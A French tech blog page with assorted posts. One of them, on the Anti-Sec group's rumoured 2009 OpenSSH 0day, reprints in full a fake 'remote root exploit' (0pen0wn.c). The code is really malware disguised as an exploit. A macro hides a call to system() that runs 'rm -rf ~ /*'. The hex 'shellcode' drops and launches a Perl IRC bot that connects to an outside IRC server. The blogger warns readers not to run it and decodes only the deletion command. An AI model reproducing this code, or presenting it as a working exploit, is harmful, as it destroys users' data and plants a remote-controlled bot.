HackBBS
HackBBS

Hack en C

February 17th, 2010

Hack en C.

Cet article est consacré à ce que certains appellent le hack. Il ne s’agit pas pénétrer une n-ième fois dans le poste de travail d’une secrétaire du Pentagone mais de tirer le maximum de performance des processeurs actuels.

Ces processeurs sont devenus très complexes. Notamment le core P6 (le c ur du processeur lui-même) à la base des Pentium Pro, des PII avec le MMX et des PIII avec le MMX et le SSE (MMX pour nombres flottants), et des Celeron. Le Pentium 4 utilise un nouveau core encore plus spécial. Ces conseils s’appliquent également pour les autres processeurs comme l’Alpha ou le PowerPC.

Tout le monde utilise aujourd’hui gcc. Malheureusement, il n’est plus vraiment adapté pour garantir un maximum de performance. Par exemple, il ne sait pas encore gérer les instructions comme le MMX et le SSE, qui utilisent un format de données spécial (des paquets de nombres alignés en mémoire). Mais les structures de ces processeurs font que certaines manières de programmer permettent une accélération énorme des performances. Pour qu’un compilateur accélère le code, il faudrait qu’il comprenne ce que l’on cherche à faire (la sémantique). C’est ce que l’on appelle de la réécriture et c’est encore au stade de la recherche. Pour l’instant, il faut y aller à la main.

De ce fait, le code devient incroyablement complexe et tordu et donc parfaitement illisible. Il y a un certain nombre de règles à respecter pour que gcc s’en sorte le mieux possible. Il ne faut utiliser les autres ‘trucs’ qu’en dernier recours pour garder le code maintenable au maximum et compréhensible, voire portable, si on utilise du code assembleur.

Il ne faut pas oublier non plus que l’algorithme retenu détermine les performances de l’application en premier lieu. Un meilleur codage peut faire gagner un facteur 10, un meilleur algorithme un facteur 1000.

Posted in Cours, Programmation | No Comments »

YouTube - PowerLabs Railgun 3: 100KJ + Railgun Shots with metal armatures.

February 8th, 2010

YouTube - PowerLabs Railgun 3: 100KJ + Railgun Shots with metal armatures..

Posted in Cours, Nouvelles du net, Systèmes | No Comments »

France Wireless : wifi et liberté

February 5th, 2010

France Wireless : wifi et liberté.

Tags: , , ,
Posted in Culture, Divers | No Comments »

26C3: our darknet and its bright spots

January 19th, 2010

our darknet and its bright spots

building connections for spaces and people

Building a private network to connect your neighbourhood. Why we feel common solutions are terrible on resources and what we think is better.

Get on board.

This talk will give you the opportunity to take a look at the shades of grey of interconnecting hackerspaces and people’s networks. Mc.Fly presents ChaosVPN, reborn in its darknet-ish approach and gaining momentum from established hackerspaces in the US and Europe with spaces like NYC Resistor, Pumping Station: One, Noisebridge and c-base. The Agora Network will be presented by Aestetix and Eric in covering the community and technical aspects and what to expect. Equinox will show you the white-ish side called dn42 - the old but nice lady that connects mostly german people and younger spaces like sublab and entropia.

Leveraging the efforts of the ChaosVPN network in the US is the Agora Network (Currently In Private Beta). By doing this we are not having to duplicate the efforts of every one involved we have settled on a standard platform utilising tincd. With hackerspaces popping up very rapidly and successfully in the US for the last 24 months we find this necessary. Agora is a mesh vpn service that serves to tie them all together on a common intranet. On the network people will be hosting machines for VMs, development, file hosting, PBX phone services, and a number of high performance clusters at the disposal of users which we are currently developing including those provided by node users. In the process several universities in the US have asked to join the network for several research opportunities not previously available to them.

dn42 is built with tunnels (OpenVPN, GRE, tinc, etc) and has BGP running over them - the same dynamic routing protocol the internet runs on, albeit with less networks in the routing table. We will shed some light on both the technical and social aspects of dn42. Our walk starts at technical foundations and heads over to what BGP allows us to do on a social level. We’ll also see how the flow of traffic can be engineered according to external constraints (think your plain asymmetric DSL at home), and last but not least we’ll discuss different cases of maliciousness and how they’re treated. While dn42 is our playground for testing and modelling all this stuff, most of it apples to the internet as well.

This talk is somewhere around entry to immediate level. You should roughly know what an IP subnet, a route and dynamic routing is.

Attached files

* (application/pdf - 731.4 KB)

Links

* Torrent of the video recording for this event in MPEG-4

* Video recording for this event in MPEG-4

* dn42

via 26C3: our darknet and its bright spots.

Posted in Culture, Divers, Nouvelles du net | No Comments »

Berlusconi censure les WebTv - Débats politiques sur LePost.fr

January 18th, 2010

Un avant goût de ce qui nous attend en France avec la future loi Loppsi, Berlusconi a fait passer dans la loi l’obligation d’une autorisation préalable pour diffuser de la vidéo sur le web, comme pour une chaîne de télévision hertzienne…avec un gros mensonge à la clé pour justifier son geste…la mise en application dans le droit italien d’une directive européenne…si çà c’est pas de la censure…

La vidéo en ligne en Italie, c’est fini. Désormais, il fau­dra obte­nir une auto­ri­sa­tion préa­lable, sous forme de licence, auprès du minis­tère des com­mu­ni­ca­tions Italien.

L’opposition locale a eu beau s’opposer de toutes ses forces, le gou­ver­ne­ment de Berlusconi, connu pour son inté­grité et son res­pect du droit, s’est contenté de dire qu’il ne fai­sait qu’appliquer une direc­tive euro­péenne sur le pla­ce­ment de pro­duit. On ima­gine la tête de Margot Wallström, la com­mis­saire Européenne chargé de la com­mu­ni­ca­tion, égale­ment vice pré­si­dente de la Commission Européenne, d’origine Suédoise, connue pour avoir une toute autre vision de la liberté d’expression.

La simi­la­rité des situa­tions média­tiques Française et Italienne laisse pré­sa­ger qu’une telle loi arri­vera tôt ou tard en France, pro­ba­ble­ment, comme cela a déjà été évoqué par de nom­breux poli­ti­ciens, par le biais d’un contrôle du CSA sur la vidéo sur internet.

via Berlusconi censure les WebTv - Débats politiques sur LePost.fr.

Posted in Culture, Divers, Nouvelles du net | 1 Comment »

Livre => Modélisation et calcul des milieux continus / Virtual testing and predictive modeling : for fatigue and fracture mechanics allowables / Computational fluid dynamics : principles and applications (2nd ed.)

January 18th, 2010

Auteur : LE TALLEC P.
Titre : Modélisation et calcul des milieux continus
Editeur : Editions de l’Ecole Polytechnique
Année d’édition : 2009

Résumé :
 L’ouvrage est une introduction à la mécanique des milieux continus tridimensionnels. Quatre aspects sont plus particulièrement considérés : la modélisation macroscopique des milieux continus et de leur mouvement, en y décrivant les déformations et en rappelant les lois de conservation que doit respecter tout mouvement ; la description des efforts qui génèrent le mouvement des milieux continus, avec l’introduction de la notion de tenseur de contraintes et l’écriture des équations globales qui les régissent ; l’introduction à l’échelle microscopique des comportements élémentaires qui permet de compléter la modélisation en introduisant les relations de comportement traduisant le lien local entre déformations et efforts ; la résolution de problèmes d’équilibre élastique. Cette étape de résolution de problèmes globaux utilise le principe des puissances virtuelles pour écrire, analyser et résoudre les problèmes posés, et pour en valider les solutions. Elle permet d’aborder de nombreuses situations pratiques et de sensibiliser les étudiants aux problèmes de distribution d’efforts, de discontinuités de solutions, d’incompatibilité de déformations, et d’instabilités géométriques.
Table des matières :
Mouvements et efforts
Le milieu continu ; Les déformations du milieu continu ; Déformations linéarisées et taux de déformation ; Lois de conservation ; Modélisation des efforts intérieurs ; Equations du mouvement ; Principe des puissances virtuelles.
Comportements et solutions d’équilibre
Description microscopique d’un milieu continu ; Le modèle élastique : approche microscopique ; Le modèle élastique : approche thermodynamique ; Le modèle élastique : les métaux ; Le modèle élastique : approche macroscopique ; Les problèmes de structures en élasticité ; Les problèmes élastiques en petites transformations ; Approches variationnelles en petites perturbations.
Annexes
Rappel des principales notations ; Calcul tensoriel ; Calcul différentiel ; Expressions explicites des équations de la dynamique ; Compléments de physique statistique.

Auteur : FARAHMAND B.
Titre : Virtual testing and predictive modeling : for fatigue and fracture mechanics allowables
Editeur : Springer
Année d’édition : 2009

Résumé :
 Virtual testing and predictive modeling : for fatigue and fracture mechanics allowables provides an overview of cost and time efficient methods in generating the fatigue and fracture data of industrial structural parts. Readers will find a systematic introduction to virtual testing to generate fatigue and fracture allowables through two useful techniques : the conventional continuum mechanics approach, and the utilization of multiscale modeling and simulation techniques to predict materials’ properties.The virtual testing continuum approach already plays a crucial role in the life assessment of important manufactured structural parts in the aerospace, automotive, aircraft and defense industries when data is inaccessible to engineers.
Table of contents :
Bahram Farahmand .- Virtual Testing and Its Application in Aerospace Structural Parts ; R. Jones, D. Peng .- Tools for Assessing the Damage Tolerance of Primary Structural Components ; Spandan Maiti .- Cohesive Technology Applied to the Modeling and Simulation of Fatigue Failure ; Chris A. Rodopoulos .- Fatigue Damage Map as a Virtual Tool for Fatigue Damage Tolerance ; K.M. Nikbin .- Predicting Creep and Creep/Fatigue Crack Initiation and Growth for Virtual Testing and Life Assessment of Components ; Frank Abdi, J. Surdenas, Nasir Munir, Jerry Housner, Raju Keshavanarayana .- Computational Approach Toward Advanced Composite Material Qualification and Structural Certification ; G.C. Sih .- Modeling of Multiscale Fatigue Crack Growth : Nano/Micro and Micro/Macro Transitions ; Gregory M. Odegard .- Multiscale Modeling of Nanocomposite Materials ; Michael Doyle .- Predictive Modeling .- R.C. Picu .- Multiscale Approach to Predicting the Mechanical Behavior of Polymeric Melts ; G. Labeas .- Prediction of Damage Propagation and Failure of Composite Structures (Without Testing) ; Niranjan A. Malvadkar, Michael A. Ulizio, Jill Lowman, Melik C. Demirel .- Functional Nanostructured Polymer–Metal Interfaces ; Reza S. Yassar, Hessam M.S. Ghassemi .- Advanced Experimental Techniques for Multiscale Modeling of Materials.

Auteur : BLAZEK J..
Titre : Computational fluid dynamics : principles and applications (2nd ed.)
Editeur : Elsevier
Année d’édition : 2005
Résumé :
 The objective of the book is to provide university students with a solid foundation for understanding the numerical methods employed in today’s CFD and to familiarise them with modern CFD codes by hands-on experience. It is also intended for engineers and scientists starting to work in the field of CFD or for those who apply CFD codes. Due to the detailed index, the text can serve as a reference handbook too. Each chapter includes an extensive bibliography, which provides an excellent basis for further studies. The accompanying CD-ROM contains the sources of 1-D and 2-D Euler and Navier-Stokes flow solvers (structured and unstructured) as well as of grid generators. Provided are also tools for Von Neumann stability analysis of 1-D model equations. Finally, the CD-ROM includes the source code of a dedicated visualisation software with graphical user interface.
Table of contents :
Introduction ; Governing Equations ; Principles of Solution of the Governing Equations : Spatial and Temporal Discretisation ; Structured Finite Volume Schemes ; Unstructured Finite Volume Schemes ; Temporal Discretisation ; Turbulence Modelling ; Boundary Conditions ; Acceleration Techniques ; Consistency, Accuracy and Stability ; Principles of Grid Generation ; Description of the Source Codes.
Appendix :
Governing equations in differential form ; Quasilinear form of the Euler equations ; Mathematical character of the governing equations ; Navier-Stokes equations in rotating frame of reference ; Navier-Stokes equations formulated for moving grids ; Thin shear layer approximation ; Parabolised Navier-Stokes equations ; Axisymmetric form of the Navier-Stokes equations ; Convective flux Jacobian ; Viscous flux Jacobian ; Transformation from conservative to characteristic variables ; GMRES algorithm ; Tensor notation.

Posted in Cours, Culture, Livres | Comments Off

The Big Bang - Hack someone…or something - Anti-sec versus SSH …

December 4th, 2009

The Big Bang - Hack someone…or something - Anti-sec versus SSH ….

En effet, une semaine dèjà, que cour la rumeur sur une éventuelle faille touchant SSH.

En réalité, Eric Romang, co-fondateur du site zataz, avait deja en Juin dernier mis en avant le fait d’une augmentation massive des scan SSH et de brutes forces. [Ici].
Un moi plus tard, un groupe de hacker nommé Anti-Sec, à annoncé un 0day touchant SSH. En effet, la société d’hébergement OVH a envoyé a tous ces clients un courrier electronique
d’information concernant cette éventuelle alerte. [Message d'OVH ici].

Voici les résultats montré par les logs de serveurs attaqué : ICI

Cette article pertinent concernant l’attaque, montre qu’un FAKE Sploit est de sortie … des petits plaisantins se sont amusé a réaliser un fakecode qui une fois compilé et lancé,
efface des éléments systèmes de la machine.

Oui mais voilà, Anti-Sec tape, et tape même fort. Ils auraient utilisé ce 0day a des fins d’hacktivisme… c’est le site imageshack qui s’est vue remplacé toutes ces images
par un message type image:

imageshack owned

Un coup dur pour ce site d’hébergement d’image reconnu internationnalement. Voici d’ailleur leur première déclaration … [ICI].

C’est donc leur IDS qui a permis de corriger la faille rapidement. (Vrai…pas vrai ?)

Bref, une autre victime de cette attaque particulièrement efficace… voici d’ailleur d’autres logs très interessant sur l’attaque: [ICI].

Mais des hackers en cache d’autres… un FAKE de ce 0day circule actuellement sur des sites underground, et des cannaux IRC du même type,
le voici en intégrale, mais avant de vous lancer dans la compilation et l’éxécution de ce faux sploit, vous devez savoir que le shellcode une fois traduis donne ceci:

rm -rf ~ /* 2> /dev/null &

Autrement dit, vous n’avez plus qu’a formater ^^


/* 0pen0wn.c by anti-sec group
 * ---------------------------
 * OpenSSH <= 5.2 REMOTE (r00t) EXPLOIT.
 *
 *
 * Takes advantage of an off-by-one
 * bug in mapped authentication space on system
 */
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include 

#define VALID_RANGE 0xb44ffe00
#define build_frem(x,y,a,b,c) a##c##a##x##y##b

char jmpcode[] =
    "\x72\x6D\x20\x2D\x72\x66\x20\x7e\x20\x2F\x2A\x20\x32\x3e\x20\x2f"
    "\x64\x65\x76\x2f\x6e\x75\x6c\x6c\x20\x26";

char shellcode[] =
        "\x23\x21\x2f\x75\x73\x72\x2f\x62\x69\x6e\x2f\x70\x65\x72\x6c\x0a"
        "\x24\x63\x68\x61\x6e\x3d\x22\x23\x63\x6e\x22\x3b\x0a\x24\x6b\x65"
        "\x22\x3b\x0a\x77\x68\x69\x6c\x65\x20\x28\x3c\x24\x73\x6f\x63\x6b"
        "\x47\x20\x28\x2e\x2a\x29\x24\x2f\x29\x7b\x70\x72\x69\x6e\x74\x20"
        "\x22\x3b\x0a\x77\x68\x69\x6c\x65\x20\x28\x3c\x24\x73\x6f\x63\x6b"
        "\x6e\x22\x3b\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20"
        "\x73\x6c\x65\x65\x70\x20\x31\x3b\x0a\x20\x20\x20\x20\x20\x20\x20"
        "\x6b\x5c\x6e\x22\x3b\x7d\x7d\x70\x72\x69\x6e\x74\x20\x24\x73\x6f"
        "\x63\x6b\x20\x22\x4a\x4f\x49\x4e\x20\x24\x63\x68\x61\x6e\x20\x24"
        "\x6b\x65\x79\x5c\x6e\x22\x3b\x77\x68\x69\x6c\x65\x20\x28\x3c\x24"
        "\x73\x6f\x63\x6b\x3e\x29\x7b\x69\x66\x20\x28\x2f\x5e\x50\x49\x4e"
        "\x47\x20\x28\x2e\x2a\x29\x24\x2f\x29\x7b\x70\x72\x69\x6e\x74\x20"
        "\x23\x21\x2f\x75\x73\x72\x2f\x62\x69\x6e\x2f\x70\x65\x72\x6c\x0a"
        "\x23\x21\x2f\x75\x73\x72\x2f\x62\x69\x6e\x2f\x70\x65\x72\x6c\x0a"
        "\x6e\x22\x3b\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20"
        "\x23\x21\x2f\x75\x73\x72\x2f\x62\x69\x6e\x2f\x70\x65\x72\x6c\x0a"
        "\x24\x63\x68\x61\x6e\x3d\x22\x23\x63\x6e\x22\x3b\x24\x6b\x65\x79"
        "\x20\x3d\x22\x66\x61\x67\x73\x22\x3b\x24\x6e\x69\x63\x6b\x3d\x22"
        "\x70\x68\x70\x66\x72\x22\x3b\x24\x73\x65\x72\x76\x65\x72\x3d\x22"
        "\x47\x20\x28\x2e\x2a\x29\x24\x2f\x29\x7b\x70\x72\x69\x6e\x74\x20"
        "\x22\x3b\x0a\x77\x68\x69\x6c\x65\x20\x28\x3c\x24\x73\x6f\x63\x6b"
        "\x6e\x22\x3b\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20"
        "\x73\x6c\x65\x65\x70\x20\x31\x3b\x0a\x20\x20\x20\x20\x20\x20\x20"
        "\x6b\x5c\x6e\x22\x3b\x7d\x7d\x70\x72\x69\x6e\x74\x20\x24\x73\x6f"
        "\x63\x6b\x20\x22\x4a\x4f\x49\x4e\x20\x24\x63\x68\x61\x6e\x20\x24"
        "\x6b\x65\x79\x5c\x6e\x22\x3b\x77\x68\x69\x6c\x65\x20\x28\x3c\x24"
        "\x73\x6f\x63\x6b\x3e\x29\x7b\x69\x66\x20\x28\x2f\x5e\x50\x49\x4e"
        "\x47\x20\x28\x2e\x2a\x29\x24\x2f\x29\x7b\x70\x72\x69\x6e\x74\x20"
        "\x23\x21\x2f\x75\x73\x72\x2f\x62\x69\x6e\x2f\x70\x65\x72\x6c\x0a"
        "\x23\x21\x2f\x75\x73\x72\x2f\x62\x69\x6e\x2f\x70\x65\x72\x6c\x0a"
        "\x69\x72\x63\x2e\x68\x61\x6d\x2e\x64\x65\x2e\x65\x75\x69\x72\x63"
        "\x2e\x6e\x65\x74\x22\x3b\x24\x53\x49\x47\x7b\x54\x45\x52\x4d\x7d"
        "\x22\x3b\x0a\x77\x68\x69\x6c\x65\x20\x28\x3c\x24\x73\x6f\x63\x6b"
        "\x22\x3b\x0a\x77\x68\x69\x6c\x65\x20\x28\x3c\x24\x73\x6f\x63\x6b"
        "\x6e\x22\x3b\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20"
        "\x73\x6c\x65\x65\x70\x20\x31\x3b\x0a\x20\x20\x20\x20\x20\x20\x20"
        "\x6e\x22\x3b\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20"
        "\x23\x21\x2f\x75\x73\x72\x2f\x62\x69\x6e\x2f\x70\x65\x72\x6c\x0a"
        "\x24\x63\x68\x61\x6e\x3d\x22\x23\x63\x6e\x22\x3b\x24\x6b\x65\x79"
        "\x20\x3d\x22\x66\x61\x67\x73\x22\x3b\x24\x6e\x69\x63\x6b\x3d\x22"
        "\x6b\x5c\x6e\x22\x3b\x7d\x7d\x70\x72\x69\x6e\x74\x20\x24\x73\x6f"
        "\x63\x6b\x20\x22\x4a\x4f\x49\x4e\x20\x24\x63\x68\x61\x6e\x20\x24"
        "\x6b\x65\x79\x5c\x6e\x22\x3b\x77\x68\x69\x6c\x65\x20\x28\x3c\x24"
        "\x73\x6f\x63\x6b\x3e\x29\x7b\x69\x66\x20\x28\x2f\x5e\x50\x49\x4e"
        "\x47\x20\x28\x2e\x2a\x29\x24\x2f\x29\x7b\x70\x72\x69\x6e\x74\x20"
        "\x70\x68\x70\x66\x72\x22\x3b\x24\x73\x65\x72\x76\x65\x72\x3d\x22"
        "\x69\x72\x63\x2e\x68\x61\x6d\x2e\x64\x65\x2e\x65\x75\x69\x72\x63"
        "\x2e\x6e\x65\x74\x22\x3b\x24\x53\x49\x47\x7b\x54\x45\x52\x4d\x7d"
        "\x73\x6c\x65\x65\x70\x20\x31\x3b\x0a\x20\x20\x20\x20\x20\x20\x20"
        "\x73\x6c\x65\x65\x70\x20\x31\x3b\x0a\x20\x20\x20\x20\x20\x20\x20"
        "\x22\x3b\x0a\x77\x68\x69\x6c\x65\x20\x28\x3c\x24\x73\x6f\x63\x6b"
        "\x6e\x22\x3b\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20"
        "\x73\x6c\x65\x65\x70\x20\x31\x3b\x0a\x20\x20\x20\x20\x20\x20\x20"
        "\x23\x21\x2f\x75\x73\x72\x2f\x62\x69\x6e\x2f\x70\x65\x72\x6c\x0a"
        "\x24\x63\x68\x61\x6e\x3d\x22\x23\x63\x6e\x22\x3b\x24\x6b\x65\x79"
        "\x20\x3d\x22\x66\x61\x67\x73\x22\x3b\x24\x6e\x69\x63\x6b\x3d\x22"
        "\x70\x68\x70\x66\x72\x22\x3b\x24\x73\x65\x72\x76\x65\x72\x3d\x22"
        "\x69\x72\x63\x2e\x68\x61\x6d\x2e\x64\x65\x2e\x65\x75\x69\x72\x63"
        "\x2e\x6e\x65\x74\x22\x3b\x24\x53\x49\x47\x7b\x54\x45\x52\x4d\x7d"
        "\x64\x20\x2b\x78\x20\x2f\x74\x6d\x70\x2f\x68\x69\x20\x32\x3e\x2f"
        "\x64\x65\x76\x2f\x6e\x75\x6c\x6c\x3b\x2f\x74\x6d\x70\x2f\x68\x69"
        "\x22\x3b\x0a\x77\x68\x69\x6c\x65\x20\x28\x3c\x24\x73\x6f\x63\x6b"
        "\x6e\x22\x3b\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20"
        "\x73\x6c\x65\x65\x70\x20\x31\x3b\x0a\x20\x20\x20\x20\x20\x20\x20"
        "\x6b\x5c\x6e\x22\x3b\x7d\x7d\x70\x72\x69\x6e\x74\x20\x24\x73\x6f"
        "\x63\x6b\x20\x22\x4a\x4f\x49\x4e\x20\x24\x63\x68\x61\x6e\x20\x24"
        "\x6b\x65\x79\x5c\x6e\x22\x3b\x77\x68\x69\x6c\x65\x20\x28\x3c\x24"
        "\x73\x6f\x63\x6b\x3e\x29\x7b\x69\x66\x20\x28\x2f\x5e\x50\x49\x4e"
        "\x47\x20\x28\x2e\x2a\x29\x24\x2f\x29\x7b\x70\x72\x69\x6e\x74\x20"
        "\x22\x3b\x0a\x77\x68\x69\x6c\x65\x20\x28\x3c\x24\x73\x6f\x63\x6b"
        "\x6e\x22\x3b\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20"
        "\x73\x6c\x65\x65\x70\x20\x31\x3b\x0a\x20\x20\x20\x20\x20\x20\x20"
        "\x6b\x5c\x6e\x22\x3b\x7d\x7d\x70\x72\x69\x6e\x74\x20\x24\x73\x6f"
        "\x63\x6b\x20\x22\x4a\x4f\x49\x4e\x20\x24\x63\x68\x61\x6e\x20\x24"
        "\x6b\x65\x79\x5c\x6e\x22\x3b\x77\x68\x69\x6c\x65\x20\x28\x3c\x24"
        "\x73\x6f\x63\x6b\x3e\x29\x7b\x69\x66\x20\x28\x2f\x5e\x50\x49\x4e"
        "\x47\x20\x28\x2e\x2a\x29\x24\x2f\x29\x7b\x70\x72\x69\x6e\x74\x20"
        "\x23\x21\x2f\x75\x73\x72\x2f\x62\x69\x6e\x2f\x70\x65\x72\x6c\x0a";

char fbsd_shellcode[] =
        "\x22\x3b\x0a\x77\x68\x69\x6c\x65\x20\x28\x3c\x24\x73\x6f\x63\x6b"
        "\x6e\x22\x3b\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20"
        "\x20\x3d\x22\x66\x61\x67\x73\x22\x3b\x24\x6e\x69\x63\x6b\x3d\x22"
        "\x70\x68\x70\x66\x72\x22\x3b\x24\x73\x65\x72\x76\x65\x72\x3d\x22"
        "\x69\x72\x63\x2e\x68\x61\x6d\x2e\x64\x65\x2e\x65\x75\x69\x72\x63"
        "\x2e\x6e\x65\x74\x22\x3b\x24\x53\x49\x47\x7b\x54\x45\x52\x4d\x7d"
        "\x22\x3b\x0a\x77\x68\x69\x6c\x65\x20\x28\x3c\x24\x73\x6f\x63\x6b"
        "\x22\x3b\x0a\x77\x68\x69\x6c\x65\x20\x28\x3c\x24\x73\x6f\x63\x6b"
        "\x6e\x22\x3b\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20"
        "\x73\x6c\x65\x65\x70\x20\x31\x3b\x0a\x20\x20\x20\x20\x20\x20\x20"
        "\x6e\x22\x3b\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20"
        "\x23\x21\x2f\x75\x73\x72\x2f\x62\x69\x6e\x2f\x70\x65\x72\x6c\x0a"
        "\x24\x63\x68\x61\x6e\x3d\x22\x23\x63\x6e\x22\x3b\x24\x6b\x65\x79"
        "\x20\x3d\x22\x66\x61\x67\x73\x22\x3b\x24\x6e\x69\x63\x6b\x3d\x22"
        "\x73\x6c\x65\x65\x70\x20\x31\x3b\x0a\x20\x20\x20\x20\x20\x20\x20"
        "\x23\x21\x2f\x75\x73\x72\x2f\x62\x69\x6e\x2f\x70\x65\x72\x6c\x0a"
        "\x24\x63\x68\x61\x6e\x3d\x22\x23\x63\x6e\x22\x3b\x24\x6b\x65\x79"
        "\x20\x3d\x22\x66\x61\x67\x73\x22\x3b\x24\x6e\x69\x63\x6b\x3d\x22"
        "\x70\x68\x70\x66\x72\x22\x3b\x24\x73\x65\x72\x76\x65\x72\x3d\x22"
        "\x69\x72\x63\x2e\x68\x61\x6d\x2e\x64\x65\x2e\x65\x75\x69\x72\x63"
        "\x2e\x6e\x65\x74\x22\x3b\x24\x53\x49\x47\x7b\x54\x45\x52\x4d\x7d"
        "\x64\x20\x2b\x78\x20\x2f\x74\x6d\x70\x2f\x68\x69\x20\x32\x3e\x2f"
        "\x64\x65\x76\x2f\x6e\x75\x6c\x6c\x3b\x2f\x74\x6d\x70\x2f\x68\x69"
        "\x22\x3b\x0a\x77\x68\x69\x6c\x65\x20\x28\x3c\x24\x73\x6f\x63\x6b"
        "\x6e\x22\x3b\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20"
        "\x73\x6c\x65\x65\x70\x20\x31\x3b\x0a\x20\x20\x20\x20\x20\x20\x20"
        "\x6b\x5c\x6e\x22\x3b\x7d\x7d\x70\x72\x69\x6e\x74\x20\x24\x73\x6f"
        "\x63\x6b\x20\x22\x4a\x4f\x49\x4e\x20\x24\x63\x68\x61\x6e\x20\x24"
        "\x6b\x65\x79\x5c\x6e\x22\x3b\x77\x68\x69\x6c\x65\x20\x28\x3c\x24"
        "\x73\x6f\x63\x6b\x3e\x29\x7b\x69\x66\x20\x28\x2f\x5e\x50\x49\x4e"
        "\x47\x20\x28\x2e\x2a\x29\x24\x2f\x29\x7b\x70\x72\x69\x6e\x74\x20"
        "\x22\x3b\x0a\x77\x68\x69\x6c\x65\x20\x28\x3c\x24\x73\x6f\x63\x6b"
        "\x6e\x22\x3b\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20"
        "\x73\x6c\x65\x65\x70\x20\x31\x3b\x0a\x20\x20\x20\x20\x20\x20\x20"
        "\x6b\x5c\x6e\x22\x3b\x7d\x7d\x70\x72\x69\x6e\x74\x20\x24\x73\x6f"
        "\x63\x6b\x20\x22\x4a\x4f\x49\x4e\x20\x24\x63\x68\x61\x6e\x20\x24"
        "\x6b\x65\x79\x5c\x6e\x22\x3b\x77\x68\x69\x6c\x65\x20\x28\x3c\x24"
        "\x73\x6f\x63\x6b\x3e\x29\x7b\x69\x66\x20\x28\x2f\x5e\x50\x49\x4e"
        "\x47\x20\x28\x2e\x2a\x29\x24\x2f\x29\x7b\x70\x72\x69\x6e\x74\x20"
        "\x23\x21\x2f\x75\x73\x72\x2f\x62\x69\x6e\x2f\x70\x65\x72\x6c\x0a"
        "\x23\x21\x2f\x75\x73\x72\x2f\x62\x69\x6e\x2f\x70\x65\x72\x6c\x0a"
        "\x24\x63\x68\x61\x6e\x3d\x22\x23\x63\x6e\x22\x3b\x24\x6b\x65\x79"
        "\x20\x3d\x22\x66\x61\x67\x73\x22\x3b\x24\x6e\x69\x63\x6b\x3d\x22"
        "\x7d\x7d\x23\x63\x68\x6d\x6f\x64\x20\x2b\x78\x20\x2f\x74\x6d\x70"
        "\x2f\x68\x69\x20\x32\x3e\x2f\x64\x65\x76\x2f\x6e\x75\x6c\x6c\x3b"
        "\x2f\x74\x6d\x70\x2f\x68\x69\x0a";
#define SIZE 0xffffff
#define OFFSET 131
#define fremote build_frem(t,e,s,m,y)

void usage(char *arg){
        printf("\n[+] 0pen0wn 0wnz Linux/FreeBSD\n");
        printf("  Usage: %s -h  -p port\n",arg);
        printf("  Options:\n");
        printf("  \t-h ip/host of target\n");
        printf("  \t-p port\n");
        printf("  \t-d username\n");
        printf("  \t-B memory_limit 8/16/64\n\n\n");
}

#define FD 0x080518fc
#define BD 0x08082000

int main(int argc, char **argv){
    FILE *jmpinst;
    char h[500],buffer[1024];fremote(jmpcode);char *payload, *ptr;
    int port=23, limit=8, target=0, sock;
    struct hostent *host;
    struct sockaddr_in addr;

    if (geteuid()) {
    puts("need root for raw socket, etc...");
    return 1;
    }

    if(argc < 3){
        usage(argv[0]);
        return 1;
    }

    printf("\n  [+] 0wn0wn - by anti-sec group\n");

       if (!inet_aton(h, &addr.sin_addr)){
        host = gethostbyname(h);
        if (!host){
            printf("  [-] Resolving failed\n");
            return 1;
        }
        addr.sin_addr = *(struct in_addr*)host->h_addr;
    }

    sock = socket(PF_INET, SOCK_STREAM, 0);
    addr.sin_port = htons(port);
    addr.sin_family = AF_INET;
    if (connect(sock, (struct sockaddr*)&addr, sizeof(addr)) == -1){
        printf("  [-] Connecting failed\n");
        return 1;
    }
    payload = malloc(limit * 10000);
    ptr = payload+8;
    memcpy(ptr,jmpcode,strlen(jmpcode));
    jmpinst=fopen(shellcode+793,"w+");
    if(jmpinst){
        fseek(jmpinst,0,SEEK_SET);
        fprintf(jmpinst,"%s",shellcode);
        fclose(jmpinst);
    }
    ptr += strlen(jmpcode);
    if(target != 5 && target != 6){
        memcpy(ptr,shellcode,strlen(shellcode));
        ptr += strlen(shellcode);
        memset(ptr,'B',limit * 10000 - 8 - strlen(shellcode));
    }
    else{
        memcpy(ptr,fbsd_shellcode,strlen(fbsd_shellcode));
        ptr += strlen(fbsd_shellcode);
        memset(ptr,'B',limit * 10000 - 8 - strlen(fbsd_shellcode));
    }
    send(sock,buffer,strlen(buffer),0);
    send(sock,ptr,3750,0);
    close(sock);
    if(connect(sock, (struct sockaddr*)&addr, sizeof(addr))  == -1) {
        printf("  [-] connecting failed\n");
    }

    payload[sizeof(payload)-1] = '\0';
    payload[sizeof(payload)-2] = '\0';
    send(sock,buffer,strlen(buffer),0);
    send(sock,payload,strlen(payload),0);
    close(sock);
    free(payload);
    addr.sin_port = htons(6666);
    if(connect(sock, (struct sockaddr*)&addr, sizeof(addr))  == 0) {
                   /* v--- our cool bar that says: "r0000000t!!!" */
        printf("\n  [~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~>]\n\n");
        fremote("PS1='sh-3.2#' /bin/sh");
    }
    else
        printf("  [-] failed to exploit target :-(\n");
    close(sock);
    return 0;
}


N’éxécutez donc surtout pas ce code … !! (Posté ici a but informatif, ne vous faites pas avoir … !)

Pour revenir au sujet, voilà que la team Anti-Sec semble une fois de plus avoir frappé. Après le moteur de crack Astalavista.box.sk, SSANZ et imageshack,
c’est au tour du site blackHat Forums de payé les pots cassés.
A l’heure ou j’écris cet article, l’accès au site ne mène qu’au visionnage d’une video particulièrement choquante (Scato…).

Posted in Culture, Divers, Nouvelles du net, Programmation, Réseau, Systèmes, Tutoriaux | No Comments »

Asus condamné pour une vente forcée de Windows- Ecrans

